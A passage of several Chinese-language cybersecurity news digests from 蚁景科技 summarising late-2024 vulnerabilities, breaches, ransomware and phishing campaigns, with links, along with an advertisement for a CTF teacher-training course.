25”，揭示了过去一年间超过31000个漏洞背后的主要软件漏洞。这些漏洞涵盖软件代码、架构、实现或设计中的缺陷，攻击者可利用它们控制受影响设备、访问敏感数据或发动拒绝服务（DoS）攻击。榜单的生成基于对2023年至2024年间31770条CVE记录的分析，重点关注纳入CISA“已知被利用漏洞”（KEV）目录的安全问题。MITRE指出，这些弱点通常易于发现和利用，可能导致系统全面失控、数据被窃取或应用程序瘫痪。CISA强调，企业应参考此榜单优化软件安全策略，将这些弱点作为开发和采购环节 4、金融科技巨头Finastra调查SFTP系统遭攻击后的数据泄露事件 https://www.bleepingcomputer.com/news/security/fintech-giant-finastra-investigates-data-breach-after-sftp-hack/ 全球金融科技巨头Finastra确认，其安全文件传输平台（SFTP）系统遭到黑客攻击后，客户数据可能被泄露。该公司在11月7日发现威胁行为者使用被盗凭证访问SFTP系统，目前正在与第三方网络安全专家合作展开调查。初步评估显示，攻击范围仅限于SFTP平台，未发生横向移动。黑客在地下论坛声称掌握了Finastra的400GB数据并试图出售，但相关帖子已被删除，数据是否已售出尚 5、微软打击ONNX网络钓鱼服务并公开其运营者身份 https://www.securityweek.com/microsoft-disrupts-onnx-phishing-service-names-its-operator/ 微软宣布成功打击了ONNX网络钓鱼服务，通过法律诉讼查封了240个关联域名，并曝光了该服务的主要运营者——埃及男子Abanoub Nady（网名MRxC0DER）。微软表示，Nady长期从事网络钓鱼工具包的开发和销售，包括ONNX、Caffeine和FUHRER等，通过“网络钓鱼即服务”模式为犯罪分子提供工具，以窃取用户凭证并发起大规模攻击。ONNX的工具包支持中间人攻击（AitM），能够绕过多因素认证，加剧了威胁 6、社交平台BlueSky出现一系列加密货币骗局 https://www.bleepingcomputer.com/news/security/now-bluesky-hit-with-crypto-scams-as-it-crosses-20-million-users/ 随着去中心化社交平台BlueSky用户数量突破2000万，网络犯罪分子也开始将目标转向该平台。据报道，近期BlueSky上出现了一系列加密货币骗局，包括伪造与科技巨头Meta相关的“MetaChain”和“MetaCoin”虚假资产宣传，以及冒充获奖公告诱导用户访问恶意网站。部分诈骗信息采用AI生成的图片和精心仿制的Meta品牌设计，误导用户相信其合法性。此外，还有帖子 7、研究人员发现Fortinet VPN日志机制存在盲点 https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/ 研究人员在分析Fortinet VPN客户端时，发现一种自动验证凭据的方法，并揭示了FortiClient VPN的日志机制存在的潜在盲点。尽管Fortinet并未将其认定为漏洞，但这一问题可能为攻击者提供机会，威胁企业网络的安全。研究表明，通过简单的HTTPS请求即可触发服务器的身份验证尝试，服务器会返回凭据状态，包括有效、失败或因尝试过多而被限制的错误。这种反馈机制为研究人员理解认证流程提供了关键信息，同时也为攻击者可能利用这一机制规避传统安全监控敞开 8、攻击者利用Palo Alto防火墙漏洞发起攻击活动 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/#post-137539-_50343o6a6han Palo Alto Networks及其威胁情报团队Unit 42持续追踪针对CVE-2024-0012和CVE-2024-9474漏洞的攻击活动。这些漏洞允许未经认证的攻击者通过管理接口获得PAN-OS管理员权限，进一步执行恶意操作或利用权限提升漏洞进行攻击。Unit 42将此次漏洞利用活动命名为“Lunar Peek行动”。自2024年11月19日第三方研究人员公开技术细节以来，相关威胁行为显著增加，涉及手动 9、CISA警告BianLian勒索软件转型为数据窃取团伙 https://www.bleepingcomputer.com/news/security/cisa-says-bianlian-ransomware-now-focuses-only-on-data-theft/ 美国网络安全与基础设施安全局（CISA）、联邦调查局（FBI）和澳大利亚网络安全中心（ACSC）发布的最新联合公告显示，BianLian勒索软件组织已完全转型为以数据窃取为核心的勒索团伙。这一变化标志着该组织自2024年1月起彻底放弃加密文件的勒索模式。BianLian早期采用“双重勒索”模式，即在窃取数据后加密受害者系统以索取赎金。然而，自2023年初起，该组织逐步放弃文件加 10、攻击者滥用Avast的Anti-Rootkit驱动程序绕过安全防护 https://www.trellix.com/blogs/research/when-guardians-become-predators-how-malware-corrupts-the-protectors/ 最新的恶意攻击活动利用了Avast的旧版Anti-Rootkit驱动程序的漏洞，通过禁用目标系统的安全组件来规避检测并获得控制权限。此恶意软件变种名为“AV Killer”，它携带了一个硬编码的安全进程列表，其中包含了142个不同厂商的安全软件进程名。根据Trellix的安全研究人员发现，这一攻击采用了“自带漏洞驱动程序”（BYOVD）策略，利用Avast的Anti-Rootki 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员披露ngioweb僵尸网络代理服务器架构 https://blog.lumen.com/one-sock-fits-all-the-use-and-abuse-of-the-nsocks-botnet/ Lumen Technologies的Black Lotus Labs团队深入研究了“ngioweb”僵尸网络的架构，并揭示其作为犯罪代理服务NSOCKS核心技术的角色。NSOCKS是最常用的犯罪代理之一，日均活跃超35,000台僵尸设备，分布在全球180个国家，其中约80%的设备由Ngioweb网络控制。大部分僵尸网络设备为SOHO路由器和物联网设备，其中三分之二的代理节点位于美国。通过对全球互联网流量的深入分析，研究人员追踪了这 2、攻击者利用社交媒体虚假广告传播恶意软件 https://www.malwarebytes.com/blog/news/2024/11/free-ai-editor-lures-in-victims-installs-information-stealer-instead-on-windows-and-mac 近日，一场大规模社交媒体宣传活动以“免费AI视频编辑器”为幌子，诱导用户下载信息窃取恶意软件。攻击者利用X、Facebook和YouTube等平台发布链接，吸引用户进入一个看似专业的网站。然而，下载链接实际隐藏着Lumma Stealer（针对Windows用户）和Atomic Stealer（针对macOS用户）这两种恶意软 3、Windows Kerberos漏洞可能导致数百万服务器遭受攻击 https://hackread.com/windows-kerberos-flaw-millions-of-servers-attack/ 微软近日在其“补丁星期二”更新中修复了Windows Kerberos认证协议中的一项关键漏洞（CVE-2024-43639）。该漏洞具有9.8的CVSS评分（严重级别），允许攻击者通过特制的请求实现未经授权的访问和远程代码执行（RCE）。由于Windows Server的广泛应用以及漏洞的易用性，这一漏洞对全球企业构成了重大威胁。Censys的研究表明，目前超过227万台Windows服务器暴露在互联网上，其中121万台可能受此漏洞影响，尤其是配置为 4、D-Link警告用户停用受RCE漏洞影响的VPN路由器 https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10415 D-Link近日发布公告，敦促用户停止使用已到服务期限的VPN路由器型号，包括DSR-150、DSR-150N、DSR-250和DSR-250N。这些设备存在未经身份验证的远程代码执行（RCE）漏洞，该问题将不会得到修复。漏洞由安全研究员“delsploit”发现并报告，目前未公开技术细节，以防止大规模恶意利用的发生。漏洞影响固件版本从3.13到3.17B901C的所有硬件和固件修订版本。这些路由器广泛用于家庭办公和小型企业环境，但 5、苹果修复两个针对Intel Mac系统的零日漏洞 https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/ 苹果公司近日发布紧急安全更新，修复了两处被攻击者利用的零日漏洞。这些漏洞存在于macOS Sequoia操作系统中的JavaScriptCore（CVE-2024-44308）和WebKit（CVE-2024-44309）组件中，主要影响基于Intel芯片的Mac设备。CVE-2024-44308漏洞允许攻击者通过恶意网页实现远程代码执行，而CVE-2024-44309漏洞则 6、Ubuntu needrestart软件包存在10年之久的漏洞可用于提权 https://cybersecuritynews.com/10-year-old-flaws-in-ubuntu-server/ 在 Ubuntu Server 的默认软件包 Needrestart 组件中发现了五个严重的本地权限升级 (LPE) 漏洞后，网络安全社区处于高度戒备状态。这些缺陷存在了近十年，可能允许任何非特权用户在无需用户交互的情况下获得完全的 root 访问权限，从而对系统安全构成重大威胁。 7、严重的 AnyDesk 漏洞可泄露用户 IP 地址 https://cybersecuritynews.com/critical-anydesk-vulnerability-let-attackers-uncover-user-ip-address/ 流行的远程桌面应用程序 AnyDesk 中发现了一个严重漏洞，该漏洞可能允许攻击者暴露用户的 IP 地址。该漏洞编号为 CVE-2024-52940，影响 Windows 系统上的 AnyDesk 版本 8.1.0 及更早版本。 8、175个国家超 145,000 个工控系统被发现暴露在互联网 https://thehackernews.com/2024/11/over-145000-industrial-control-systems.html 新研究发现，175 个国家/地区有超过 145,000 个暴露于互联网的工业控制系统 (ICS)，其中仅美国就占暴露总数的三分之一以上。来自攻击面管理公司 Censys 的分析发现，38% 的设备位于北美，35.4% 位于欧洲，22.9% 位于亚洲，1.7% 位于大洋洲，1.2% 位于南美洲，0.5% 位于欧洲。非洲。 9、Google AI工具OSS-Fuzz在开源项目中发现了 26 个漏洞 https://thehackernews.com/2024/11/googles-ai-powered-oss-fuzz-tool-finds.html 谷歌透露，其人工智能驱动的模糊测试工具 OSS-Fuzz 已被用来帮助识别各种开源代码存储库中的 26 个漏洞，其中包括 OpenSSL 加密库中的一个中等严重性缺陷。 10、微软将举办大型线下黑客大会，400万美元悬赏云计算与 AI漏洞 https://www.ithome.com/0/811/750.htm 微软宣布将举办一场名为“零日探索”（Zero Day Quest）的线下黑客大会，旨在鼓励研究人员发现影响云计算和人工智能工作负载的软件中的高危安全漏洞。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Helldown勒索软件利用Zyxel防火墙漏洞入侵目标网络 https://blog.sekoia.io/helldown-ransomware-an-overview-of-this-emerging-threat/ Sekoia的威胁检测与研究团队（TDR）于2024年10月31日通过社交媒体监控发现，Helldown勒索软件推出了针对Linux系统的变体。这一勒索软件组织原先仅针对Windows系统，但近期显现出高度活跃的态势，在三个月内声称攻破了31家受害者，包括网络安全解决方案提供商Zyxel的欧洲子公司。Helldown使用双重勒索策略，通过漏洞利用进入目标网络，窃取数据并威胁公开未支付赎金的受害者信息。其新发现的Linux变体进一步扩展 2、攻击者利用Spotify传播盗版软件和游戏外挂 https://www.bleepingcomputer.com/news/security/spotify-abused-to-promote-pirated-software-and-game-cheats/ 网络犯罪分子利用Spotify的播放列表和播客平台，通过嵌入关键词和链接推广盗版软件、游戏外挂、垃圾链接及“Warez”网站。这些内容被精心设计，以利用Spotify在搜索引擎中的高排名，为可疑网站引流。近期，一份名为“Sony Vegas Pro 13 Crack...”的Spotify播放列表被发现用于引导用户访问免费软件站点。网络安全爱好者Karol Paciorek指出，S 3、Oracle修复被利用的Agile PLM文件泄露漏洞 https://www.oracle.com/security-alerts/alert-cve-2024-21287.html 近日，Oracle发布了针对Oracle Agile产品生命周期管理（PLM）的安全警报，修复了一个被追踪为CVE-2024-21287的高危漏洞。该漏洞允许攻击者在无需身份验证的情况下，通过网络远程访问并下载系统中的文件。根据Oracle官方声明，此漏洞已被在野利用，对用户的数据安全构成了严重威胁。该漏洞的CVSS评分为7.5，影响了当前仍处于Premier Support或Extended Support阶段的Agile PLM版本。Oracle提醒未获得支持 4、福特调查一起涉及4.4万条客户记录的数据泄露事件 https://www.securityweek.com/ford-investigating-potential-breach-after-hackers-claim-data-theft/ 福特公司正在调查一起潜在的数据泄露事件，此前黑客在网络犯罪论坛BreachForums声称窃取了约4.4万条客户记录。11月17日，知名黑客IntelBroker和EnergyWeaponUser在帖子中宣称，他们本月针对福特发动攻击，获取了包括客户姓名、地址及产品购买信息在内的数据。然而，公开的数据样本显示，这些“客户”可能指的是全球各地的福特经销商，而非终端用户。数据样本中的地址多为公开信息，敏感 5、印度竞争委员会对Meta处以超过2500万美元的罚款 https://www.govinfosecurity.com/india-fines-whatsapp-25m-bans-data-sharing-for-5-years-a-26855 印度竞争委员会（CCI）对社交媒体巨头Meta处以逾2500万美元罚款，指控其通过2021年更新的WhatsApp服务条款，强制用户同意与Meta旗下其他平台共享数据。CCI还下令Meta停止将用户数据用于其他平台上的广告用途。2021年1月4日的WhatsApp条款更新要求用户接受将数据与Meta平台共享的规定，否则将无法继续使用该服务。此更新声称数据共享将用于改进广告体验并确保安全性，但未提供用户退出 6、Progress Kemp LoadMaster漏洞已被攻击者利用 https://www.bleepingcomputer.com/news/security/cisa-tags-progress-kemp-loadmaster-flaw-as-exploited-in-attacks/ 美国网络安全与基础设施安全局（CISA）近日将三个新漏洞加入其“已知被利用漏洞”（KEV）目录，其中包括一个影响Progress Kemp LoadMaster的关键操作系统命令注入漏洞（CVE-2024-1212）。该漏洞由Rhino Security Labs发现并于2024年2月21日通过更新修复，但这是首次确认其在野被利用。漏洞评分为CVSS 10.0（极其严重） 7、Mozilla 0Din警告ChatGPT沙箱缺陷使Python执行 https://hackread.com/mozilla-0din-chatgpt-sandbox-flaws-python-execution/ Mozilla的0Din揭示了ChatGPT沙箱中的关键缺陷，允许Python代码执行和访问内部配置，OpenAI只解决了五个问题中的一个。 8、境外间谍利用视频监控系统漏洞伺机窃取我国家秘密 https://www.thepaper.cn/newsDetail_forward_29371787 近日，某市市民向国家安全机关举报，该市某排水公司安装的一批视频监控设备可能覆盖海警码头，存在失泄密隐患，国家机关立即开展深入调查。 9、Apache Hertz Beat漏洞让攻击者渗透敏感数据 https://cybersecuritynews.com/apache-hertzbeat-vulnerability/ 此漏洞被归类为低严重性，它可能被威胁行为者利用，以获得未经授权的敏感数据访问。 10、《工业和信息化领域数据安全合规指引》正式发布 https://www.secrss.com/articles/72535 为贯彻落实《数据安全法》《网络数据安全管理条例》《工业和信息化领域数据安全管理办法（试行）》等法律政策要求，引导工业和信息化领域数据处理者规范开展数据处理活动，中国钢铁工业协会、中国有色金属工业协会、中国石油和化学工业联合会、中国建筑材料联合会、中国机械工业联合会、中国汽车工业协会、中国纺织工业联合会、中国轻工业联合会、中国电子信息行业联合会、中国计算机行业协会、中国通信企业协会、中国互联网协会、中国通信标准化协会、中国中小企业国际合作协会、中国通信学会、工业和信息化部商用密码应用产业促进联盟、工业信息安全产业发展联 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Bitdefender披露利用流行平台传播恶意软件的攻击活动 https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users 2024年，Bitdefender实验室揭露了一场利用Facebook广告平台进行恶意广告攻击的活动，该活动伪装成知名密码管理工具Bitwarden的扩展更新，诱骗用户安装恶意浏览器扩展，从而窃取个人及商业数据。攻击者通过Facebook投放的假冒广告，以“警告：您的密码存在风险！”等紧急语言吸引用户点击。广 2、Broadcom警告vCenter Server漏洞已被攻击者利用 https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md 在近期关于VMware vCenter漏洞的更新中，Broadcom于本周确认CVE-2024-38812和CVE-2024-38813已经被“野外利用”，这使得这些漏洞的威胁等级进一步上升。尽管公司在9月已经发布了相关安全补丁，但由于原始补丁未能完全修复CVE-2024-38812，该漏洞的安全公告在一个月后被更新，并强烈建议管理员立即应用新发布的修补程 3、攻击者利用Microsoft 365管理门户发送性勒索邮件 https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/ 近期，有不法分子滥用Microsoft 365管理门户的消息中心功能，大量发送性勒索邮件。这些邮件伪装成微软官方通知，绕过传统电子邮件安全平台，直接进入用户的收件箱，从而增加受害者上当的可能性。性勒索邮件通常声称黑客窃取了用户的隐私视频或图像，并威胁公开这些内容以索要500至5000美元不等的赎金。这类骗局自2018年首次出现以来便具有高盈利性，当时每周可获利超5万美元。尽管传统 4、美柚：未发现用户信息泄露等违规情况 https://baijiahao.baidu.com/s?id=1816044775890731577 11月18日，美柚发布声明称，留意到近期网络上关于“涉黄短信骚扰”的讨论，公司第一时间进行了自查核实，未发现用户信息泄露等违法违规情况。 美柚表示，作为全国网络安全标准化技术委员会（TC260）的成员单位，公司拥有完善的信息安全保障力量，成功通过信息系统网络安全三级等保测评。 5、美方指控“与中国有关黑客”入侵多家电信公司网络 https://baijiahao.baidu.com/s?id=1815695836131464495 外交部发言人林剑表示，中方在网络安全问题上的立场是一贯的，我们没有兴趣利用网络干涉别国内政，更反对出于政治目的，散布与中国相关的虚假信息。 6、Samba AD 漏洞允许攻击者提升权限 https://cybersecuritynews.com/samba-ad-vulnerability/ 研究人员在 Samba Active Directory （AD） 实施中发现了一个严重漏洞，该漏洞可能允许攻击者提升权限并可能接管整个域。 7、物联网云平台 OvrC 曝一系列漏洞，黑客可远程执行恶意代码 https://www.donews.com/news/detail/4/4610723.html 安全公司 Claroty 发布报告，曝光了一款海外流行的物联网设备云端管理平台 Ovr 内含的一系列重大漏洞。安全公司声称黑客可以接连利用这些漏洞实现在物联网设备上远程执行恶意代码，而根据 CVSS 风险评估，部分曝光的漏洞风险评分高达 9.2（满分 10 分）。 8、越南黑客针对欧洲和亚洲部署新型 PXA 窃取程序 https://thehackernews.com/2024/11/vietnamese-hacker-group-deploys-new-pxa.html 一名讲越南语的攻击者针对欧洲和亚洲的政府和教育实体部署了一种名为 PXA Stealer 、基于 Python 的新型恶意软件。 9、GitHub CLI 漏洞可能导致远程代码执行 https://www.anquanke.com/post/id/301994 GitHub 命令行界面 (CLI) 中发现了一个严重的安全漏洞 (CVE-2024-52308)，该漏洞可能会在用户的工作站上实现远程代码执行 (RCE)。该漏洞的 CVSS 得分为 8.1，它强调了勤奋的软件更新实践和开发人员安全意识的重要性。 10、PA PAN-OS身份认证绕过漏洞在野利用 https://www.secrss.com/articles/72501 Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)，PAN-OS 设备管理 Web 界面中存在身份认证绕过漏洞，未经身份验证的远程攻击者可以通过网络访问管理 Web 界面，从而进行后续活动，包括修改设备配置、访问其他管理功能以及利用 Palo Alto Networks PAN-OS 权限提升漏洞(CVE-2024-9474)获取root访问权限。目前该漏洞已发现在野利用。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

为了深入贯彻习近平总书记关于建设网络强国的战略思想，响应“十四五”规划中对网络安全教育与人才培养的明确要求，把握当前国际国内网络安全教育工作面临的新形势，增强网络安全领域专业教师在信息系统安全课程中的实践教学技能，深化对行业实践和技术发展的理解，推动高等院校网络安全专业学科建设和实战教学水平的全面提升。针对网络安全CTF竞赛、网安实战实训等网安教学热点需求，特举办此次“2025年网络安全高级研修班”。 一、组织单位 指导单位：中国网络空间安全人才教育论坛 主办单位：湖南蚁景科技有限公司 二、培训内容 1、CTF竞赛与文件操作 了解CTF的起源、竞赛模式以及如何学习CTF。学习文件上传漏洞和文件包含漏洞的利用方法，以及如何通过这些漏洞获取shell。 2、SQL注入 介绍MySQL注入的基础知识，包括联合查询注入、文件操作、宽字节注入、堆叠查询。学习布尔盲注和延时盲注的技巧，以及如何利用报错注入。 3、跨站脚本攻击与XML外部实体注入 掌握XSS漏洞的利用方法，并通过对综合题目的讲解加深理解。了解XML外部实体注入的原理，并学习XXE的综合利用方法。 4、反序列化 学习PHP反序列化漏洞的原理，包括字符逃逸技巧和Phar反序列化。探讨Python Pickle反序列化和YAML注入的相关知识。 5、AWD线下赛与CTF真题讲解 了解AWD+_Break_Fix_CD赛制，并学习AWD基础与攻击防护。通过对CTF真题的讲解，加深对CTF竞赛题目的理解。 三、培训对象 全国高校、职业院校计算机相关专业（信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等）专业负责人、学科带头人、专业骨干教师、实验室人员等。 四、预期收获 1、CTF竞赛知识：掌握CTF竞赛的基础知识和学习方法，为参与CTF竞赛打下坚实的基础。 2、安全漏洞利用：学会识别和利用常见的安全漏洞，如文件上传、文件包含、SQL注入、XSS攻击和XML外部实体注入等。 3、反序列化攻击：理解反序列化漏洞的原理，并掌握PHP和Python环境下的反序列化攻击技巧。 4、攻防实战经验：通过AWD赛制的学习，获得网络安全攻防的实战经验。 5、真题分析能力：通过对CTF真题的讲解，提升分析和解决实际CTF题目的能力。 6、安全防护意识：增强对网络安全威胁的认识，学习如何进行有效的攻击防护。 7、结业证书：获得由蚁景科技颁发的培训结业证书。 五、培训安排 1、培训方式：线下会议 / 线上直播 2、培训时间：2025年1月13日-1月17日（1月12日报到） 3、培训地点：湖南长沙 4、会议规模：100人 六、报名方式 1、报名时间：即日起至2025年1月12日 2、报名邮箱：edu@yijingsec.com 3、电话咨询：黄老师 18774948349 4、培训费用：3680元/人（含培训资料，路费和住宿费用自理，自备电脑） 5、付款方式：      ◆ 线上汇款： （请务必在备注栏里注明“学校名+参会者姓名”）         公司名称：湖南蚁景科技有限公司         开户行名称：建设银行长沙金星支行         开户行账号：4305 0178 4836 0000 0935      ◆ 现场缴费：现金、扫码或刷卡（银行卡、公务卡均可）  具体课程内容 扫描下方二维码即可报名：

1、攻击者利用SVG附件传播恶意代码以规避检测 https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/威胁行为者越来越多地利用SVG（可缩放矢量图形）文件在网络攻击中规避检测，通过展示钓鱼表单或传播恶意软件来实施攻击。不同于传统的JPG和PNG格式依赖像素点构成图像，SVG文件以文本形式描述数学公式，生成线条、形状和图案。这种结构使SVG文件在浏览器中打开时可以动态生成图像，同时能够在不同分辨率下保持高质量，适用于多种设备和应用场景。然而，这种灵活性也被攻击者滥用。S 2、微软Power Pages配置错误可能导致敏感数据大规模泄露 https://hackread.com/microsoft-power-pages-misconfigurations-data-leak/SaaS安全公司AppOmni近日发现，微软Power Pages存在配置漏洞，导致多个组织的敏感数据被公开泄露。Power Pages作为一个低代码平台，每月有超过2.5亿用户使用，其灵活性和可操作性定制性在吸引企业的同时，也增加了配置错误的风险。研究指出，问题的核心在于对访问控制设置的不当配置。Power Pages依赖站点级、表级和列级权限进行分层控制，但当组织未正确设置这些权限时，敏感数据可能被公开访问。例如，英国国家健康服务（NHS）因配置问题 3、超过400万个WordPress网站因漏洞面临严重风险 https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/超过400万个WordPress网站因使用“Really Simple Security”插件而受到影响，该插件被发现存在严重的认证绕过漏洞，允许攻击者远程获取站点的完整管理员权限。漏洞影响所有启用了两步验证功能的站点，可被大规模脚本化用于自动化攻击。Wordfence威胁情报团队于2024年11月6日首次披露了该漏洞，并与插件开发团队合作推送了安全补丁更新。专业版补丁于11月12日发布，免费版于11月14日推送。由于漏洞的严重性（CVSS评分 4、国家网信办发布《移动互联网未成年人模式建设指南》 https://mp.weixin.qq.com/s/qt-1tn30ttVlvNzh4Y8Sqg《指南》共7章，细化不同主体的具体建设任务，统一“三方联动”“一键启动”等技术标准，为企业履行未成年人网络保护义务提供指引。 5、谷歌Gemini咒骂学生凸显AI失控风险 https://mp.weixin.qq.com/s/DheJpZBV9X_Y230q0iqyuwAI大模型接连爆出失控案例，继聊天机器人诱导青少年自杀后，谷歌AI聊天模型在辅导学生作业时也突然“情绪失控”。 6、谷歌推出屏蔽电子邮件功能来隐藏你的主要电子邮件地址 https://cybersecuritynews.com/google-announces-shielded-email-feature/谷歌推出了一项名为“屏蔽电子邮件”的突破性新功能，旨在彻底改变电子邮件隐私并打击垃圾邮件。这一创新工具允许 Gmail 用户创建临时电子邮件别名，在注册在线服务或填写表格时有效地掩盖他们的主要电子邮件地址。 7、PostgreSQL安全更新，修复多个漏洞 https://cybersecuritynews.com/postgresql-security-update-patch-for-multiple-vulnerabilities/PostgreSQL 全球开发小组已针对所有受支持的 PostgreSQL 版本发布了重要安全更新。所有受支持的 PostgreSQL 版本包括 17.1、16.5、15.9、14.14、13.17 和 12.21。此安全更新解决了近几个月报告的 4 个安全漏洞和超过 35 个错误。 8、VMware 称难以修复的 vCenter Server 漏洞已被利用 https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/这家虚拟化技术巨头发布了其 VMSA-2024-0019 公告的紧急更新，承认了实时攻击，并号召客户优先部署可用修复程序。该公司表示：“Broadcom 的 VMware 确认 CVE-2024-38812 和 CVE-2024-38813 已在野外被利用。” 9、美国 300 个饮用水系统遭受破坏性黑客攻击 https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/美国环境保护局 (EPA) 监察长办公室 (OIG) 的一份新报告显示，为美国约 1.1 亿人口提供服务的 300 多个饮用水系统受到漏洞影响，可能导致服务中断。 10、Citrix Virtual Apps 和 Desktop 中的严重漏洞被利用 https://securityonline.info/critical-vulnerabilities-in-citrix-virtual-apps-and-desktops-actively-exploited/根据Johannes B. Ullrich博士的一份报告，Citrix 的“虚拟应用程序和桌面”远程访问解决方案中的两个漏洞 CVE-2024-8068 和 CVE-2024-8069 正在被积极利用。 SANS.edu 的研究。这些漏洞是由多种因素共同造成的，包括暴露且配置错误的 Microsoft 消息队列 (MSMQ) 实例，以及 Citrix 软件堆栈中不安全的 Binar 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。